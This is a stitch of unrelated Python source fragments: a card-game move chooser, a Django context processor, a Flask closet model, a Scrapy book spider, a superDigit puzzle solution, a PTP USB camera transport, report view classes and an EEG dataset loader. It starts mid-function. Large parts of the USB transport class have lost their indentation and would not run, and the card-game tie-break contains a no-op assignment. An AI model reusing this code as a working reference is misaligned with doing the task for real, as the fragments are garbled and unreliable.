                        options[index] = (option[0], option[1], new_opt_id)
            # Tournament over all options except the default at index 0.
            efficiency = None
            for option in options:
                if option == options[0]:
                    continue
                eff = effectivness(option, threatClass)
                if efficiency is None:
                    efficiency = eff
                elif eff[0] == Option.PLAY and efficiency[0] == eff[0] and efficiency[1][0] == eff[1][0]:
                    # Tie between two plays: prefer the higher-attack minion.
                    if eff[1][1].compareCardtype(Cardtype.MINION) and efficiency[1][1].compareCardtype(Cardtype.MINION):
                        if eff[1][1]._attack < efficiency[1][1]._attack:
                            eff = efficiency
                elif eff[0] == Option.PLAY and efficiency[0] == eff[0] and efficiency[1][0] > eff[1][0]:
                    efficiency = eff
                elif eff[0] == Option.ATTACK and efficiency[0] == eff[0]:
                    # NOTE(review): takes the HIGHER score here while plays
                    # take the lower — verify the comparison direction.
                    if efficiency[1][0] < eff[1][0]:
                        efficiency = eff
                    elif efficiency[1][0] == eff[1][0]:
                        if eff[1][1].getAttack() > efficiency[1][1].getAttack():
                            efficiency = eff
                elif eff[0] == Option.ATTACK and not efficiency[0] == eff[0]:
                    # NOTE(review): efficiency[0] is an Option constant, yet
                    # it is compared against -7 — verify.
                    if efficiency[0] < -7 and eff[1][0] == -2:
                        efficiency = eff
                elif eff[0] == Option.PLAY and not efficiency[0] == eff[0]:
                    if eff[1][0] > -7:
                        efficiency = eff
            if efficiency[0] == Option.PLAY and efficiency[1][0] > 0:
                # Best play is still net-negative value: just end the turn.
                return options[0]
            else:
                return (efficiency[0], efficiency[1][1], efficiency[1][2])
    except Exception, e:
        print 'options()', e
|
# Context processor: keeps the active navBar item highlighted by exposing
# the current request path to every template.
def url(request):
    """Return a template context dict holding the current request path."""
    return {'url': request.path}
|
from db import db
class ClosetModel(db.Model):
    """SQLAlchemy model for a user's closet: a named container of items
    with contact details (phone number and carrier) attached."""
    __tablename__ = 'closet'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(80))
    phone_number = db.Column(db.String(80))
    carrier = db.Column(db.String(80))
    # lazy='dynamic': items is a query object, only executed on access.
    items = db.relationship('ItemModel', lazy='dynamic')
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    user = db.relationship('UserModel')
    def __init__(self, name, user_id, phone_number, carrier):
        self.name = name
        self.user_id = user_id
        self.phone_number = phone_number
        self.carrier = carrier
    def json(self):
        """Serializable dict representation, including all items."""
        return {
            '_id': self.id,
            'name': self.name,
            'user_id': self.user_id,
            'phone_number': self.phone_number,
            'carrier': self.carrier,
            'items': [item.json() for item in self.items.all()]
        }
    @classmethod
    def find_by_id(cls, _id):
        # Look up a closet by primary key; None when absent.
        return cls.query.filter_by(id=_id).first()
    @classmethod
    def find_by_uid(cls, uid):
        # First closet owned by the given user id; None when absent.
        return cls.query.filter_by(user_id=uid).first()
    @classmethod
    def find_by_name(cls, name):
        # First closet with the given name; None when absent.
        return cls.query.filter_by(name=name).first()
    def save_to_db(self):
        # Insert or update this row.
        db.session.add(self)
        db.session.commit()
    def delete_from_db(self):
        # Delete this row.
        db.session.delete(self)
        db.session.commit()
|
"""
created by ldolin
"""
import scrapy
from learn.items import PaquItem
class PaquSpider(scrapy.Spider):
    """Crawl 23us.so category listing pages (categories 1-9) and yield one
    PaquItem per book with its title, author, word count and status."""
    name = "paqu1"
    start_urls = ["https://www.23us.so/list/1_1.html",
                  "https://www.23us.so/list/2_1.html",
                  "https://www.23us.so/list/3_1.html",
                  "https://www.23us.so/list/4_1.html",
                  "https://www.23us.so/list/5_1.html",
                  "https://www.23us.so/list/6_1.html",
                  "https://www.23us.so/list/7_1.html",
                  "https://www.23us.so/list/8_1.html",
                  "https://www.23us.so/list/9_1.html"]
    def parse(self, response):
        # Follow every book link in the listing table.
        urls = response.xpath('//tr/td[@class="L"]/a/@href').extract()
        for url in urls:
            yield scrapy.Request(url, callback=self.parse_info)
    def parse_info(self, response):
        # Book title and author
        book_name = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[1]/a/text()').extract_first()
        author = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[3]/text()').extract_first()  # .replace(" ", "")
        # NOTE(review): no /text() here, so zishu holds raw <td> markup.
        zishu = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[4]').extract_first()
        zt = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[6]/text()').extract_first()
        print("书名:%s,作者:%s,%s,%s" % (book_name, author,zishu,zt))
        item = PaquItem()
        item['book_name'] = book_name
        item['author'] = author
        item['zishu'] = zishu
        item['zt'] = zt
        yield item
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the superDigit function below.
# recursive but fails for 3 testcases - might be stack overflow - python limit of 995 stacks
def superDigit(n, k=1):
    """Return the super digit (digital root) of *n* repeated *k* times.

    Iterative replacement for the recursive version, which recursed once
    per character of n and hit the interpreter recursion limit on long
    inputs (the "fails for 3 testcases" noted in the original comment).

    n -- the number as a string of decimal digits
    k -- repetition count; the digit sum of the repeated string is just
         k times the digit sum of n
    """
    # Also avoids shadowing the builtin sum() the original clobbered.
    digit_sum = sum(int(ch) for ch in n) * k
    if digit_sum > 9:
        # Digital root via the mod-9 identity (9 stands in for 0).
        digit_sum %= 9
        digit_sum = 9 if digit_sum == 0 else digit_sum
    return digit_sum
# non recursive
def superDigit_non_recursive(n, k=1):
    """Super digit of n repeated k times, via the mod-9 identity."""
    remainder = (int(n) * k) % 9
    if remainder == 0:
        # A multiple of nine has digital root 9 (0 only for input 0,
        # which this shortcut maps to 9 just like the original).
        return 9
    return remainder
if __name__ == '__main__':
    # Read "n k" from stdin: n is the (possibly huge) number as a string,
    # k is how many times it is conceptually repeated.
    nk = input().split()
    n = nk[0]
    k = int(nk[1])
    result = superDigit(n, k)
    print(result)
'''This module implements the USB transport layer for PTP.
It exports the PTPUSB class. Both the transport layer and the basic PTP
implementation are Vendor agnostic. Vendor extensions should extend these to
support more operations.
'''
from __future__ import absolute_import
import atexit
import logging
import usb.core
import six
import array
from usb.util import (
endpoint_type, endpoint_direction, ENDPOINT_TYPE_BULK, ENDPOINT_TYPE_INTR,
ENDPOINT_OUT, ENDPOINT_IN,
)
from ..ptp import PTPError
from ..util import _main_thread_alive
from construct import (
Bytes, Container, Embedded, Enum, ExprAdapter, Int16ul, Int32ul, Pass,
Range, Struct,
)
from threading import Thread, Event, RLock
from six.moves.queue import Queue
from hexdump import hexdump
logger = logging.getLogger(__name__)
__all__ = ('USBTransport', 'find_usb_cameras')
__author__ = 'Luis Mario Domenzain'
PTP_USB_CLASS = 6
class find_class(object):
    '''Callable matcher for usb.core.find: selects devices of a given USB
    class code, optionally filtered by a product-name substring.'''

    def __init__(self, class_, name=None):
        self._class = class_
        self._name = name

    def __matches_name(self, device):
        # With no name filter, any class-matching device passes.
        if not self._name:
            return True
        return self._name in usb.util.get_string(device, device.iProduct)

    def __call__(self, device):
        # Match either on the device descriptor itself...
        if device.bDeviceClass == self._class:
            return self.__matches_name(device)
        # ...or on any interface of any configuration.
        for cfg in device:
            descriptor = usb.util.find_descriptor(
                cfg,
                bInterfaceClass=self._class
            )
            if descriptor is not None:
                return self.__matches_name(device)
        return False
def find_usb_cameras(name=None):
    # Iterate all connected USB devices advertising the PTP class,
    # optionally filtered by a product-name substring.
    return usb.core.find(
        find_all=True,
        custom_match=find_class(PTP_USB_CLASS, name=name)
    )
class USBTransport(object):
'''Implement USB transport.'''
    def __init__(self, *args, **kwargs):
        # NOTE(review): the string literal below is not a real docstring
        # because it follows a statement; move it to the first line.
        device = kwargs.get('device', None)
        '''Instantiate the first available PTP device over USB'''
        logger.debug('Init USB')
        self.__setup_constructors()
        # If no device is specified, find all devices claiming to be Cameras
        # and get the USB endpoints for the first one that works.
        if device is None:
            logger.debug('No device provided, probing all USB devices.')
        if isinstance(device, six.string_types):
            # A string selects by product name rather than device object.
            name = device
            logger.debug(
                'Device name provided, probing all USB devices for {}.'
                .format(name)
            )
            device = None
        else:
            name = None
        devs = (
            [device] if (device is not None)
            else find_usb_cameras(name=name)
        )
        self.__claimed = False
        self.__acquire_camera(devs)
        self.__event_queue = Queue()
        self.__event_shutdown = Event()
        # Locks for different end points.
        self.__inep_lock = RLock()
        self.__intep_lock = RLock()
        self.__outep_lock = RLock()
        # Slightly redundant transaction lock to avoid catching other request's
        # response
        self.__transaction_lock = RLock()
        self.__event_proc = Thread(
            name='EvtPolling',
            target=self.__poll_events
        )
        # Non-daemon on purpose: _shutdown (registered with atexit below)
        # joins it for a clean stop.
        self.__event_proc.daemon = False
        atexit.register(self._shutdown)
        self.__event_proc.start()
    def __available_cameras(self, devs):
        # Yield once per device whose PTP endpoints could be configured.
        # The for/else raises only when the caller exhausts the generator
        # without breaking, i.e. when no candidate device was usable.
        for dev in devs:
            if self.__setup_device(dev):
                logger.debug('Found USB PTP device {}'.format(dev))
                yield
        else:
            message = 'No USB PTP device found.'
            logger.error(message)
            raise PTPError(message)
    def __acquire_camera(self, devs):
        '''From the cameras given, get the first one that does not fail'''
        for _ in self.__available_cameras(devs):
            # Stop system drivers
            try:
                if self.__dev.is_kernel_driver_active(
                        self.__intf.bInterfaceNumber):
                    try:
                        self.__dev.detach_kernel_driver(
                            self.__intf.bInterfaceNumber)
                    except usb.core.USBError:
                        message = (
                            'Could not detach kernel driver. '
                            'Maybe the camera is mounted?'
                        )
                        logger.error(message)
            except NotImplementedError as e:
                # Some platforms (e.g. Windows) have no kernel-driver API.
                logger.debug('Ignoring unimplemented function: {}'.format(e))
            # Claim camera
            try:
                logger.debug('Claiming {}'.format(repr(self.__dev)))
                usb.util.claim_interface(self.__dev, self.__intf)
                self.__claimed = True
            except Exception as e:
                # Claim failed: try the next candidate device.
                logger.warn('Failed to claim PTP device: {}'.format(e))
                continue
            self.__dev.reset()
            break
        else:
            # Generator exhausted without a successful claim.
            message = (
                'Could not acquire any camera.'
            )
            logger.error(message)
            raise PTPError(message)
    def _shutdown(self):
        # Stop event polling and release the USB interface.  Registered
        # with atexit in __init__; tolerant of repeated calls.
        logger.debug('Shutdown request')
        self.__event_shutdown.set()
        # Free USB resource on shutdown.
        # Only join a running thread.
        if self.__event_proc.is_alive():
            self.__event_proc.join(2)
        try:
            if self.__claimed:
                logger.debug('Release {}'.format(repr(self.__dev)))
                usb.util.release_interface(self.__dev, self.__intf)
        except Exception as e:
            # Best-effort release; never raise during interpreter exit.
            # NOTE(review): logger.warn is a deprecated alias of warning.
            logger.warn(e)
# Helper methods.
# ---------------------
    def __setup_device(self, dev):
        '''Get endpoints for a device. True on success.'''
        self.__inep = None
        self.__outep = None
        self.__intep = None
        self.__cfg = None
        self.__dev = None
        self.__intf = None
        # Attempt to find the USB in, out and interrupt endpoints for a PTP
        # interface.
        for cfg in dev:
            for intf in cfg:
                if intf.bInterfaceClass == PTP_USB_CLASS:
                    for ep in intf:
                        ep_type = endpoint_type(ep.bmAttributes)
                        ep_dir = endpoint_direction(ep.bEndpointAddress)
                        if ep_type == ENDPOINT_TYPE_BULK:
                            if ep_dir == ENDPOINT_IN:
                                self.__inep = ep
                            elif ep_dir == ENDPOINT_OUT:
                                self.__outep = ep
                        elif ((ep_type == ENDPOINT_TYPE_INTR) and
                                (ep_dir == ENDPOINT_IN)):
                            self.__intep = ep
                if not (self.__inep and self.__outep and self.__intep):
                    # Incomplete endpoint set: reset and keep scanning.
                    self.__inep = None
                    self.__outep = None
                    self.__intep = None
                else:
                    logger.debug('Found {}'.format(repr(self.__inep)))
                    logger.debug('Found {}'.format(repr(self.__outep)))
                    logger.debug('Found {}'.format(repr(self.__intep)))
                    self.__cfg = cfg
                    self.__dev = dev
                    self.__intf = intf
                    return True
        return False
    def __setup_constructors(self):
        '''Set endianness and create transport-specific constructors.

        Builds the ``construct`` parsers/builders for the PTP-over-USB
        container layout: a common header (Length, Type, Code,
        TransactionID) followed by a raw payload.
        '''
        # Set endianness of constructors before using them.
        # PTP over USB is little-endian.
        self._set_endian('little')
        self.__Length = Int32ul
        self.__Type = Enum(
            Int16ul,
            default=Pass,
            Undefined=0x0000,
            Command=0x0001,
            Data=0x0002,
            Response=0x0003,
            Event=0x0004,
        )
        # This is just a convenience constructor to get the size of a header.
        self.__Code = Int16ul
        self.__Header = Struct(
            'Length' / self.__Length,
            'Type' / self.__Type,
            'Code' / self.__Code,
            'TransactionID' / self._TransactionID,
        )
        # These are the actual constructors for parsing and building.
        # They differ only in how the 16-bit code field is interpreted.
        self.__CommandHeader = Struct(
            'Length' / self.__Length,
            'Type' / self.__Type,
            'OperationCode' / self._OperationCode,
            'TransactionID' / self._TransactionID,
        )
        self.__ResponseHeader = Struct(
            'Length' / self.__Length,
            'Type' / self.__Type,
            'ResponseCode' / self._ResponseCode,
            'TransactionID' / self._TransactionID,
        )
        self.__EventHeader = Struct(
            'Length' / self.__Length,
            'Type' / self.__Type,
            'EventCode' / self._EventCode,
            'TransactionID' / self._TransactionID,
        )
        # Apparently nobody uses the SessionID field. Even though it is
        # specified in ISO15740:2013(E), no device respects it and the session
        # number is implicit over USB.
        # Up to five parameters may follow a header.
        self.__Param = Range(0, 5, self._Parameter)
        # Payload length = total container length minus the fixed header.
        self.__CommandTransactionBase = Struct(
            Embedded(self.__CommandHeader),
            'Payload' / Bytes(
                lambda ctx, h=self.__Header: ctx.Length - h.sizeof()
            )
        )
        # The adapter fills in Length automatically when building.
        self.__CommandTransaction = ExprAdapter(
            self.__CommandTransactionBase,
            encoder=lambda obj, ctx, h=self.__Header: Container(
                Length=len(obj.Payload) + h.sizeof(),
                **obj
            ),
            decoder=lambda obj, ctx: obj,
        )
        self.__ResponseTransactionBase = Struct(
            Embedded(self.__ResponseHeader),
            'Payload' / Bytes(
                lambda ctx, h=self.__Header: ctx.Length - h.sizeof())
        )
        self.__ResponseTransaction = ExprAdapter(
            self.__ResponseTransactionBase,
            encoder=lambda obj, ctx, h=self.__Header: Container(
                Length=len(obj.Payload) + h.sizeof(),
                **obj
            ),
            decoder=lambda obj, ctx: obj,
        )
    def __parse_response(self, usbdata):
        '''Helper method for parsing USB data.

        Interprets a raw USB transfer as a PTP Response, Event or
        Command/Data container and returns a ``Container`` with the
        decoded fields plus the locally tracked SessionID.
        '''
        # Build up container with all PTP info.
        logger.debug('Transaction:')
        usbdata = bytearray(usbdata)
        if logger.isEnabledFor(logging.DEBUG):
            # Dump at most the first 512 bytes to keep logs manageable.
            for l in hexdump(
                    six.binary_type(usbdata[:512]),
                    result='generator'
            ):
                logger.debug(l)
        transaction = self.__ResponseTransaction.parse(usbdata)
        # SessionID is implicit over USB, so attach the one tracked on
        # self to present callers with a complete PTP container.
        response = Container(
            SessionID=self.session_id,
            TransactionID=transaction.TransactionID,
        )
        logger.debug('Interpreting {} transaction'.format(transaction.Type))
        if transaction.Type == 'Response':
            response['ResponseCode'] = transaction.ResponseCode
            response['Parameter'] = self.__Param.parse(transaction.Payload)
        elif transaction.Type == 'Event':
            # Re-parse just the header to extract the EventCode.
            event = self.__EventHeader.parse(
                usbdata[0:self.__Header.sizeof()]
            )
            response['EventCode'] = event.EventCode
            response['Parameter'] = self.__Param.parse(transaction.Payload)
        else:
            # Anything else is treated as a command/data transfer.
            command = self.__CommandHeader.parse(
                usbdata[0:self.__Header.sizeof()]
            )
            response['OperationCode'] = command.OperationCode
            response['Data'] = transaction.Payload
        return response
    def __recv(self, event=False, wait=False, raw=False):
        '''Helper method for receiving data.

        Reads a complete PTP container from the bulk-in endpoint (or the
        interrupt endpoint when ``event``). Returns the parsed container,
        or the raw bytes when ``raw``, or None for events when nothing is
        pending.  Raises PTPError on empty reads or unexpected transfer
        types.
        '''
        # TODO: clear stalls automatically
        ep = self.__intep if event else self.__inep
        lock = self.__intep_lock if event else self.__inep_lock
        usbdata = array.array('B', [])
        with lock:
            tries = 0
            # Attempt to read a header
            # Retry up to 5 times; short reads can legitimately happen.
            while len(usbdata) < self.__Header.sizeof() and tries < 5:
                if tries > 0:
                    logger.debug('Data smaller than a header')
                    logger.debug(
                        'Requesting {} bytes of data'
                        .format(ep.wMaxPacketSize)
                    )
                try:
                    usbdata += ep.read(
                        ep.wMaxPacketSize
                    )
                except usb.core.USBError as e:
                    # Return None on timeout or busy for events
                    # errno 110=ETIMEDOUT, 16=EBUSY, 5=EIO; some backends
                    # report these only via strerror with errno None.
                    if (
                            (e.errno is None and
                             ('timeout' in e.strerror.decode() or
                              'busy' in e.strerror.decode())) or
                            (e.errno == 110 or e.errno == 16 or e.errno == 5)
                    ):
                        if event:
                            return None
                        else:
                            logger.warning('Ignored exception: {}'.format(e))
                    else:
                        logger.error(e)
                        raise e
                tries += 1
            logger.debug('Read {} bytes of data'.format(len(usbdata)))
            if len(usbdata) == 0:
                # Nothing arrived at all: normal for events, fatal otherwise.
                if event:
                    return None
                else:
                    raise PTPError('Empty USB read')
            if (
                    logger.isEnabledFor(logging.DEBUG) and
                    len(usbdata) < self.__Header.sizeof()
            ):
                logger.debug('Incomplete header')
                for l in hexdump(
                        six.binary_type(bytearray(usbdata)),
                        result='generator'
                ):
                    logger.debug(l)
            header = self.__ResponseHeader.parse(
                bytearray(usbdata[0:self.__Header.sizeof()])
            )
            if header.Type not in ['Response', 'Data', 'Event']:
                raise PTPError(
                    'Unexpected USB transfer type. '
                    'Expected Response, Event or Data but received {}'
                    .format(header.Type)
                )
            # The header announces the full container length; keep reading
            # until the whole container has arrived (64 kB chunks).
            while len(usbdata) < header.Length:
                usbdata += ep.read(
                    min(
                        header.Length - len(usbdata),
                        # Up to 64kB
                        64 * 2**10
                    )
                )
            if raw:
                return usbdata
            else:
                return self.__parse_response(usbdata)
def __send(self, ptp_container, event=False):
'''Helper method for sending data.'''
ep = self.__intep if event else self.__outep
lock = self.__intep_lock if event else self.__outep_lock
transaction = self.__CommandTransaction.build(ptp_container)
with lock:
try:
sent = 0
while sent < len(transaction):
sent = ep.write(
# Up to 64kB
transaction[sent:(sent + 64*2**10)]
)
except usb.core.USBError as e:
# Ignore timeout or busy device once.
if (
(e.errno is None and
('timeout' in e.strerror.decode() or
'busy' in e.strerror.decode())) or
(e.errno == 110 or e.errno == 16 or e.errno == 5)
):
logger.warning('Ignored USBError {}'.format(e.errno))
ep.write(transaction)
def __send_request(self, ptp_container):
'''Send PTP request without checking answer.'''
# Don't modify original container to keep abstraction barrier.
ptp = Container(**ptp_container)
# Don't send unused parameters
try:
while not ptp.Parameter[-1]:
ptp.Parameter.pop()
if len(ptp.Parameter) == 0:
break
except IndexError:
# The Parameter list is already empty.
pass
# Send request
ptp['Type'] = 'Command'
ptp['Payload'] = self.__Param.build(ptp.Parameter)
self.__send(ptp)
def __send_data(self, ptp_container, data):
'''Send data without checking answer.'''
# Don't modify original container to keep abstraction barrier.
ptp = Container(**ptp_container)
# Send data
ptp['Type'] = 'Data'
ptp['Payload'] = data
self.__send(ptp)
    @property
    def _dev(self):
        # Hide the device once shutdown has been requested so no further
        # transfers are attempted on a released interface.
        return None if self.__event_shutdown.is_set() else self.__dev

    @_dev.setter
    def _dev(self, value):
        # The underlying device is managed internally; forbid rebinding.
        raise ValueError('Read-only property')
# Actual implementation
# ---------------------
def send(self, ptp_container, data):
'''Transfer operation with dataphase from initiator to responder'''
datalen = len(data)
logger.debug('SEND {} {} bytes{}'.format(
ptp_container.OperationCode,
datalen,
' ' + str(list(map(hex, ptp_container.Parameter)))
if ptp_container.Parameter else '',
))
with self.__transaction_lock:
self.__send_request(ptp_container)
self.__send_data(ptp_container, data)
# Get response and sneak in implicit SessionID and missing
# parameters.
response = self.__recv()
logger.debug('SEND {} {} bytes {}{}'.format(
ptp_container.OperationCode,
datalen,
response.ResponseCode,
' ' + str(list(map(hex, response.Parameter)))
if ptp_container.Parameter else '',
))
return response
def recv(self, ptp_container):
'''Transfer operation with dataphase from responder to initiator.'''
logger.debug('RECV {}{}'.format(
ptp_container.OperationCode,
' ' + str(list(map(hex, ptp_container.Parameter)))
if ptp_container.Parameter else '',
))
with self.__transaction_lock:
self.__send_request(ptp_container)
dataphase = self.__recv()
if hasattr(dataphase, 'Data'):
response = self.__recv()
if not (ptp_container.SessionID ==
dataphase.SessionID ==
response.SessionID):
self.__dev.reset()
raise PTPError(
'Dataphase session ID missmatch: {}, {}, {}.'
.format(
ptp_container.SessionID,
dataphase.SessionID,
response.SessionID
)
)
if not (ptp_container.TransactionID ==
dataphase.TransactionID ==
response.TransactionID):
self.__dev.reset()
raise PTPError(
'Dataphase transaction ID missmatch: {}, {}, {}.'
.format(
ptp_container.TransactionID,
dataphase.TransactionID,
response.TransactionID
)
)
if not (ptp_container.OperationCode ==
dataphase.OperationCode):
self.__dev.reset()
raise PTPError(
'Dataphase operation code missmatch: {}, {}.'.
format(
ptp_container.OperationCode,
dataphase.OperationCode
)
)
response['Data'] = dataphase.Data
else:
response = dataphase
logger.debug('RECV {} {}{}{}'.format(
ptp_container.OperationCode,
response.ResponseCode,
' {} bytes'.format(len(response.Data))
if hasattr(response, 'Data') else '',
' ' + str(list(map(hex, response.Parameter)))
if response.Parameter else '',
))
return response
def mesg(self, ptp_container):
'''Transfer operation without dataphase.'''
logger.debug('MESG {}{}'.format(
ptp_container.OperationCode,
' ' + str(list(map(hex, ptp_container.Parameter)))
if ptp_container.Parameter else '',
))
with self.__transaction_lock:
self.__send_request(ptp_container)
# Get response and sneak in implicit SessionID and missing
# parameters for FullResponse.
response = self.__recv()
logger.debug('MESG {} {}{}'.format(
ptp_container.OperationCode,
response.ResponseCode,
' ' + str(list(map(hex, response.Parameter)))
if response.Parameter else '',
))
return response
def event(self, wait=False):
'''Check event.
If `wait` this function is blocking. Otherwise it may return None.
'''
evt = None
usbdata = None
if wait:
usbdata = self.__event_queue.get(block=True)
elif not self.__event_queue.empty():
usbdata = self.__event_queue.get(block=False)
if usbdata is not None:
evt = self.__parse_response(usbdata)
return evt
    def __poll_events(self):
        '''Poll events, adding them to a queue.

        Runs on a background thread until shutdown is requested or the
        main thread dies.  Events are queued as raw bytes and parsed
        later by ``event()``.
        '''
        while not self.__event_shutdown.is_set() and _main_thread_alive():
            try:
                # raw=True defers parsing to the consumer thread.
                evt = self.__recv(event=True, wait=False, raw=True)
                if evt is not None:
                    logger.debug('Event queued')
                    self.__event_queue.put(evt)
            except usb.core.USBError as e:
                logger.error(
                    '{} polling exception: {}'.format(repr(self.__dev), e)
                )
                # check if disconnected
                # errno 19 == ENODEV: the device is gone, stop polling.
                if e.errno == 19:
                    break
            except Exception as e:
                # Keep polling on any other error; just record it.
                logger.error(
                    '{} polling exception: {}'.format(repr(self.__dev), e)
                )
|
from typing import List, Any
from orun.views.generic.base import TemplateView
from .totals import Total
class Report(TemplateView):
    """Base report view that accumulates output lines in ``self.stream``."""

    def __init__(self):
        super().__init__()
        # Buffer of rendered lines; subclasses append via write_line().
        self.stream = []

    def write(self, s: str):
        # No-op hook; subclasses may override to emit partial content.
        pass

    def write_line(self, s: str):
        self.stream.append(s)

    def prepare(self):
        # Hook called just before rendering; subclasses build content here.
        pass

    def render_to_response(self, context, **response_kwargs):
        self.prepare()
        # BUGFIX: the response must be returned to the framework; the
        # original dropped it, so the view effectively returned None.
        return super().render_to_response(context, **response_kwargs)
class Column:
    """Report column descriptor.

    :param name: column header text (None for auto-created columns)
    :param auto_created: True when the column was synthesized from data
    :param auto_size: requested automatic sizing behaviour
    :param length: fixed display length, -1 for unconstrained
    """

    def __init__(self, name: str = None, auto_created=False, auto_size=None, length=-1):
        self.name = name
        # BUGFIX: these arguments were accepted but silently discarded,
        # so callers could never inspect them afterwards.
        self.auto_created = auto_created
        self.auto_size = auto_size
        self.length = length
class TabularReport(Report):
    """Report rendered as rows and columns; plain text by default."""

    _report_format = 'text'

    def __init__(self):
        super().__init__()
        self.columns: List[Column] = []
        self.totals: List[Total] = []
        self.report_format = self._report_format

    @property
    def report_format(self):
        """Current output format identifier."""
        return self._report_format

    @report_format.setter
    def report_format(self, value):
        self._report_format = value
        # Keep the HTTP content type in sync with the chosen format.
        known_types = {
            'json': 'application/json',
            'html': 'text/html',
        }
        self.content_type = known_types.get(value, 'text/plain')

    def write_headers(self, headers: List[str]):
        # Only auto-create columns when none have been declared yet.
        if not self.columns:
            self.columns = [
                Column(header, auto_created=True) for header in headers
            ]

    def _write_cell(self, col: Column, val: Any):
        # Formatting hook; concrete renderers override this.
        pass

    def write_row(self, cells: List):
        if not self.columns:
            # No declared columns: synthesize one anonymous column per cell.
            self.columns = [Column(auto_created=True) for _ in cells]
        for column, value in zip(self.columns, cells):
            self._write_cell(column, value)
class PaginatedReport(Report):
    """JSON-first report intended for paginated client-side rendering."""

    content_type = 'application/json'
    _report_format = 'json'

    @property
    def report_format(self):
        """Current output format identifier."""
        return self._report_format

    @report_format.setter
    def report_format(self, value):
        self._report_format = value
        # Only json/html adjust the content type; others leave it alone.
        known_types = {
            'json': 'application/json',
            'html': 'text/html',
        }
        if value in known_types:
            self.content_type = known_types[value]
|
"""SSVEP MAMEM1 dataset."""
import logging
import os.path as osp
import numpy as np
import pooch
from mne import create_info
from mne.channels import make_standard_montage
from mne.io import RawArray
from scipy.io import loadmat
from .base import BaseDataset
from .download import (
fs_get_file_hash,
fs_get_file_id,
fs_get_file_list,
fs_get_file_name,
get_dataset_path,
)
log = logging.getLogger(__name__)
MAMEM_URL = "https://ndownloader.figshare.com/files/"
# Specific release
# MAMEM1_URL = 'https://ndownloader.figshare.com/articles/2068677/versions/6'
# MAMEM2_URL = 'https://ndownloader.figshare.com/articles/3153409/versions/4'
# MAMEM3_URL = 'https://ndownloader.figshare.com/articles/3413851/versions/3'
# Alternate Download Location
# MAMEM1_URL = "https://archive.physionet.org/physiobank/database/mssvepdb/dataset1/"
# MAMEM2_URL = "https://archive.physionet.org/physiobank/database/mssvepdb/dataset2/"
# MAMEM3_URL = "https://archive.physionet.org/physiobank/database/mssvepdb/dataset3/"
def mamem_event(eeg, dins, labels=None):
    """Convert DIN field into events.

    Code adapted from
    https://github.com/MAMEM/eeg-processing-toolbox

    Writes event codes into the last (stim) row of ``eeg`` at the start
    sample of each flickering window detected from the DIN timestamps,
    and returns the modified ``eeg`` array.
    """
    gap_threshold = 2000
    timestamps = dins[1, :]
    samples = dins[3, :]
    n_dins = dins.shape[1]
    first_sample = samples[0]
    prev_ts = timestamps[0]
    t_start, freqs = [], []
    acc, count = 0, 0
    for idx in range(1, n_dins):
        cur_ts = timestamps[idx]
        if (cur_ts - prev_ts) > gap_threshold:
            # Large timestamp gap: a stimulation block just ended.
            last_sample = samples[idx - 1]
            freqs.append(acc // count)
            if (last_sample - first_sample) > 382:
                t_start.append(first_sample)
            first_sample = samples[idx]
            acc = 0
            count = 0
        else:
            # Accumulate inter-DIN intervals within the current block.
            acc = acc + (cur_ts - prev_ts)
            count = count + 1
        prev_ts = timestamps[idx]
    # Close out the final block after the loop.
    last_sample = samples[idx - 1]
    freqs.append(acc // count)
    t_start.append(first_sample)
    # Average interval -> stimulation frequency (integer Hz).
    freqs = np.array(freqs, dtype=int) * 2
    freqs = 1000 // freqs
    t_start = np.array(t_start)
    if labels is None:
        # Map detected frequency (Hz) to an event label.
        freqs_labels = {6: 1, 7: 2, 8: 3, 9: 4, 11: 5}
        for f, t in zip(freqs, t_start):
            eeg[-1, t] = freqs_labels[f]
    else:
        for f, t in zip(labels, t_start):
            eeg[-1, t] = f
    return eeg
class BaseMAMEM(BaseDataset):
    """Base class for MAMEM datasets.

    Handles downloading the figshare files and assembling MNE ``Raw``
    objects per subject/run for all three MAMEM experiments.
    """

    def __init__(self, events, sessions_per_subject, code, doi, figshare_id):
        super().__init__(
            subjects=list(range(1, 11)),
            events=events,
            interval=[1, 4],
            paradigm="ssvep",
            sessions_per_subject=sessions_per_subject,
            code=code,
            doi=doi,
        )
        # Figshare article id used to locate the remote data files.
        self.figshare_id = figshare_id

    def _get_single_subject_data(self, subject):
        """Return data for a single subject."""
        fnames = self.data_path(subject)
        filelist = fs_get_file_list(self.figshare_id)
        fsn = fs_get_file_name(filelist)
        sessions = {}
        for fpath in fnames:
            fnamed = fsn[osp.basename(fpath)]
            if fnamed[4] == "x":
                # 'x' marks the adaptation period; not a task run.
                continue
            session_name = "session_0"
            if self.code == "MAMEM3":
                # MAMEM3 splits each session into two halves (i / ii),
                # distinguishable by file-name length.
                repetition = len(fnamed) - 10
                run_name = f"run_{(ord(fnamed[4]) - 97) * 2 + repetition}"
            else:
                run_name = f"run_{ord(fnamed[4]) - 97}"
            if self.code == "MAMEM3":
                m = loadmat(fpath)
                ch_names = [e[0] for e in m["info"][0, 0][9][0]]
                sfreq = 128
                montage = make_standard_montage("standard_1020")
                eeg = m["eeg"]
            else:
                m = loadmat(fpath, squeeze_me=True)
                ch_names = [f"E{i + 1}" for i in range(0, 256)]
                ch_names.append("stim")
                sfreq = 250
                if self.code == "MAMEM2":
                    labels = m["labels"]
                else:
                    labels = None
                # DIN triggers are converted into stim-channel events.
                eeg = mamem_event(m["eeg"], m["DIN_1"], labels=labels)
                montage = make_standard_montage("GSN-HydroCel-256")
            ch_types = ["eeg"] * (len(ch_names) - 1) + ["stim"]
            info = create_info(ch_names, sfreq, ch_types)
            raw = RawArray(eeg, info, verbose=False)
            raw.set_montage(montage)
            # Simplified: replaces the original redundant three-step
            # membership/emptiness dance with a single setdefault.
            sessions.setdefault(session_name, {})[run_name] = raw
        return sessions

    def data_path(
        self, subject, path=None, force_update=False, update_path=None, verbose=None
    ):
        """Return local paths for this subject's files, fetching as needed."""
        if subject not in self.subject_list:
            raise ValueError("Invalid subject number")
        sub = f"{subject:02d}"
        sign = self.code.split("-")[0]
        key_dest = f"MNE-{sign.lower():s}-data"
        path = osp.join(get_dataset_path(sign, path), key_dest)
        filelist = fs_get_file_list(self.figshare_id)
        reg = fs_get_file_hash(filelist)
